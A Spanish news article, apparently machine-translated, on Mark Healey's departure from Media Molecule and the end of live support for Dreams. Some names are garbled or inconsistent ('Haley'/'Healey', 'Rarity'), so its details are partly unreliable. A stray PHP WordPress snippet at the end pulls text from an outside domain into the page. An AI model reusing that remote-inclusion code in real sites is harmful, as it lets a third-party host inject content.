El cofundador y director creativo de Media Molecule, Mark Haley, ha confirmado que dejará el estudio.


En una serie de tuits, Haley, quien dirigió Dreams, escribió: “Entonces, después de 17 años increíbles juntos creando Birth y Media Molecule, he decidido que es hora de que vuele el nido: zarpe y cree un nuevo rumbo. Hoy es mi último día en MM.


“Desde LittleBigPlanet hasta Dreams y más allá, estoy orgulloso de haber interpretado el papel y tengo la suerte de haber tocado con algunas personas realmente maravillosas, y una comunidad tan increíblemente talentosa de la que seré fanático”.


Agregó: “Pero un fuerte viento cósmico me atrae y mi corazón de pirata está despierto. No me estoy volviendo más joven, así que me entregaré a los diversos vientos de mi curiosidad por un tiempo y veré. ¿A dónde me llevan? ?


“Así que aquí hay un nuevo comienzo, siguiendo el corazón de uno y explorando lo desconocido – yo-hoo-hoo y una botella de ron – ¡Me voy a una aventura pirata! Una que involucra hacer juegos, eso es.


Todavía no está claro si la metáfora del pirata de Haley tiene algún significado adicional: un seguidor aparentemente lo interpretó como que se uniría a Rarity para trabajar en Sea of ​​​​Thieves, pero no hay indicios de que este sea el caso.


En cambio, el LinkedIn de Healey ahora simplemente dice que es “trabajador por cuenta propia” y “dispuesto a trabajar”.


Haley cofundó Media Molecule en 2006, luego de sus papeles en Bullfrog y Lionhead, donde trabajó con Peter Molyneux en títulos como Magic Carpet, Dungeon Keeper, Black and White y Fable.


Después de fundar Media Molecule, Haley fue director creativo de los dos primeros juegos de Little Big Planet antes de mudarse a Dreams, donde se desempeñó como director durante el largo desarrollo del juego (el estudio lo mencionó por primera vez en 2012 y se lanzó en 2020).





Aviso: Permita el uso de cookies funcionales en las preferencias de cookies para mostrar esta inserción.





La partida de Haley se produce solo seis días después de que Media Molecule anunciara que dejaría de brindar soporte a Dreams el 1 de septiembre.


En un artículo publicado en el sitio web oficial del juego, el estudio explicó que “tomó la difícil decisión de finalizar el soporte en vivo para Dreams después del 1 de septiembre de 2023 para enfocarse en un nuevo proyecto emocionante”.


Los jugadores aún podrán jugar, crear y compartir contenido en el juego después del 1 de septiembre, pero no recibirá más actualizaciones después de esa fecha.


El juego también se trasladará a un nuevo servidor a finales de mayo, momento en el que los jugadores estarán limitados a 5 GB de almacenamiento para sus creaciones.


Media Molecule anunció previamente en diciembre que el cofundador y director de arte del estudio, Karim Etoni, dejará la compañía a principios de 2023.




Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');